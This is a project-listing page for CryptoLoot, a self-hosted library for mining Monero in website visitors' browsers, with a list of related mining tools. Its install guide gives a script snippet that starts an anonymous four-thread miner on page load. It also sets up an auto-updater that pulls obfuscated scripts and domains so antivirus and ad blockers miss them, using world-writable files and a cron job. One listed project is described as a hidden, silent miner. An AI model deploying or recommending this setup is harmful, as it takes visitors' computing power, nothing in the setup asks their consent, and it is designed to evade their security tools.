All Projects → Crypto-Loot → cryptoloot

Crypto-Loot / cryptoloot

Licence: other
Self Hosted Library for CryptoLoot

Programming Languages

PHP
23972 projects - #3 most used programming language
CSS
56736 projects
HTML
75241 projects

Projects that are alternatives of or similar to cryptoloot

py-cryptonight
Python Cryptonight binding / extension. Monero hash function, proof-of-work, cn_slow_hash()
Stars: ✭ 20 (-56.52%)
Mutual labels:  mining, monero, monero-mining
Crypto-Webminer
Use Crypto Webminer JavaScript miner on various Cryptonight | CN-Lite | CN-Fast | CN-Fast2 | CN-Pico | CN-RWZ | CN-UPX2 | CN-Half | CN-Heavy | CN-Saber (BitTube) | Argon2id - Chukwa Stratum Pools
Stars: ✭ 166 (+260.87%)
Mutual labels:  mining, monero, monero-mining
p2pool
Decentralized pool for Monero mining
Stars: ✭ 635 (+1280.43%)
Mutual labels:  mining, monero, monero-mining
Ethereum nvidia miner
💰 USB flash drive ISO image for Ethereum, Zcash and Monero mining with NVIDIA graphics cards and Ubuntu GNU/Linux (headless)
Stars: ✭ 772 (+1578.26%)
Mutual labels:  mining, monero
gpu-mining-on-ubuntu16
Simplified installation of cryptominers & dependencies on Ubuntu 16.04
Stars: ✭ 19 (-58.7%)
Mutual labels:  mining, monero
Xmr Miner
Web-based Cryptocurrency miner, built with Vue.js
Stars: ✭ 444 (+865.22%)
Mutual labels:  mining, monero
Monero Stratum
Solo mining stratum for Monero & AEON with built-in Web-UI
Stars: ✭ 438 (+852.17%)
Mutual labels:  mining, monero
Lime Miner
a simple hidden silent XMR miner.
Stars: ✭ 109 (+136.96%)
Mutual labels:  mining, monero
Cryptogoblin
CryptoNote CPU/GPU mining tool for Monero (XMR)
Stars: ✭ 39 (-15.22%)
Mutual labels:  mining, monero
xmrwasp
Web and stratum proxy for Monero miners.
Stars: ✭ 18 (-60.87%)
Mutual labels:  monero, monero-mining
Coinhive Stratum Mining Proxy
Browser mining on any pool using CoinHive.js library
Stars: ✭ 240 (+421.74%)
Mutual labels:  mining, monero
Multipoolminer
Monitors crypto mining pools in real-time in order to find the most profitable for your machine. Controls any miner that is available via command line.
Stars: ✭ 750 (+1530.43%)
Mutual labels:  mining, monero
Deepminer
deepMiner webminer proxy (update for cryptoNight R)
Stars: ✭ 497 (+980.43%)
Mutual labels:  mining, monero
Webminerpool
Complete sources for a monero webminer.
Stars: ✭ 175 (+280.43%)
Mutual labels:  mining, monero
CryptoProfitSwitcher
Extensible profit switcher for crypto coins and algorithms
Stars: ✭ 49 (+6.52%)
Mutual labels:  mining, monero
Cryptonight
➿ Pure Go/ASM implementation of CryptoNight hash function with its variants, without any CGO binding.
Stars: ✭ 58 (+26.09%)
Mutual labels:  mining, monero
Nanominer
Nanominer is a versatile tool for mining cryptocurrencies on GPUs and CPUs.
Stars: ✭ 263 (+471.74%)
Mutual labels:  mining, monero
Coin Hive Stratum
use CoinHive's JavaScript miner on any stratum pool
Stars: ✭ 380 (+726.09%)
Mutual labels:  mining, monero
Mithril
Pure Rust Monero Miner
Stars: ✭ 112 (+143.48%)
Mutual labels:  mining, monero
docker-xmrig
Xmrig dockerized to mine monero cryptocurrency
Stars: ✭ 41 (-10.87%)
Mutual labels:  monero, monero-mining

cryptoloot

Self Hosted Library for CryptoLoot v3.0

Working with Monero v10 (Cryptonight v4/CryptoNightR) March 9th, 2019 Hardfork Release Also now works with UPXTWO Algorithm

How to Install:

  1. Download https://github.com/Crypto-Loot/cryptoloot/archive/master.zip and uncompress at yoursite.com home directory or alternatively use git clone https://github.com/Crypto-Loot/cryptoloot.git
  2. Register at https://crypto-loot.org to get your public site ID, you'll need this for the next step.
  3. Add the script to your website, preferably ABOVE tag, and not within the tags. Make sure to edit YOUR_PUBLIC_KEY with your site ID from crypto-loot.org:
<script src="lib/crypta.js"></script>
<script>
            var miner=new CRLT.Anonymous('YOUR_PUBLIC_KEY', {
                threads:4,autoThreads:false,throttle:0.2,coin: "xmr"
            });
        miner.start();
</script>

NOTE: Also, edit your site key above from the one you have on https://crypto-loot.org

  1. All set. Now just send some traffic!

  2. Optional: Set to automatically update (to stay up to date with the latest obfuscated scripts and domains to avoid AV/Adblocker detection): Make sure to install php-curl extension on your server if it does not exist:

CentOS:

yum install php-curl

Debian:

apt-get install php-curl

Change the permissions of these threee files to 777 so they can be overwritten on update:

chmod 777 lib/crypta.js lib/version.txt

Install the cron to check for updates once every 12 hours:

0 */12 * * * php /var/www/html/website/updater.php >> /var/www/html/website/cl_log.txt

Supported Coins:

xmr: coin: xmr upx: coin: upx Mix of both upx & xmr (50/50): coin: xmrupx

Have any questions?

Feel free to contact as at https://crypto-loot.org

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].